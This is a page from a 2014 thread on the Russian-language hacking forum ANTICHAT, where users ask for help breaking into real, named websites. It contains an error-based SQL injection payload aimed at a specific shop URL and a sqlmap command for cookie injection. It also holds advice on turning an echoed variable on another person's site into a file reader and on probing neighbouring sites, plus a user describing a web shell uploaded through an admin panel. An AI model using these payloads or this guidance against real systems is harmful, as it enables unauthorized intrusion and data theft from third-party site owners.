HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2380 из 2438 « Первая < 13801880228023302370 2376 2377 2378 2379 2380 2381 2382 2383 2384 23902430 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23791  
Старый 10.09.2014, 16:08
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
_http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.
 
Ответить с цитированием

  #23792  
Старый 10.09.2014, 16:18
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:
_http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.
http://www.moysvet.ru/catalog/view/118876'or(ExtractValue(1,concat(0x3a,(select(versi on())))))='1
 
Ответить с цитированием

  #23793  
Старый 10.09.2014, 16:57
BuG_4F
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
Провел на форуме:
1436858

Репутация: 171
Отправить сообщение для BuG_4F с помощью ICQ
По умолчанию
Помогите раскрутить скулю

Цитата:
Сообщение от None  
http://www.stu.lipetsk.ru/announcements/7595'/
 
Ответить с цитированием

  #23794  
Старый 10.09.2014, 17:20
Inkognito2008
Новичок
Регистрация: 10.09.2006
Сообщений: 6
Провел на форуме:
31237

Репутация: 0
По умолчанию
Есть участок кода на чужом сайте:

Код:
Code:
Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.

Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?

.
 
Ответить с цитированием

  #23795  
Старый 10.09.2014, 17:23
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от Inkognito2008  
Inkognito2008 said:
Есть участок кода на чужом сайте:
Код:
Code:
Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.
Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?
Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data;

Ищи конфиги БД и пробуй подключиться!
 
Ответить с цитированием

  #23796  
Старый 10.09.2014, 17:26
Inkognito2008
Новичок
Регистрация: 10.09.2006
Сообщений: 6
Провел на форуме:
31237

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:
Ищи конфиги БД и пробуй подключиться!
Сайт без БД, то есть код выполнить никак нельзя?

Если говорить точнее то вывод идет через:

Код:
Code:
$GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
Вывод подхватывается JS и выводится на сайте.
 
Ответить с цитированием

  #23797  
Старый 10.09.2014, 17:48
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от Inkognito2008  
Inkognito2008 said:
Сайт без БД, то есть код выполнить никак нельзя?
Если говорить точнее то вывод идет через:
Код:
Code:
$GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
Вывод подхватывается JS и выводится на сайте.
тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...
 
Ответить с цитированием

  #23798  
Старый 10.09.2014, 19:20
yeti2
Guest
Сообщений: n/a
Провел на форуме:
24060

Репутация: 0
По умолчанию
Помогите составить запрос в sqlmap на sql inj cookie

sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1

верно? Он то показывает блинд , то нет
 
Ответить с цитированием

  #23799  
Старый 10.09.2014, 21:34
cyborgx
Guest
Сообщений: n/a
Провел на форуме:
768

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:
во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!
допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
 
Ответить с цитированием

  #23800  
Старый 11.09.2014, 18:30
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Помогите раскрутить

Код HTML:
HTML:
http://www.svetodom.ru/brand/jhkhjkhjk
http://www.svetodom.ru/brand/jhkhjkhjk+AND
 
Ответить с цитированием
Ответ
Страница 2380 из 2438 « Первая < 13801880228023302370 2376 2377 2378 2379 2380 2381 2382 2383 2384 23902430 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ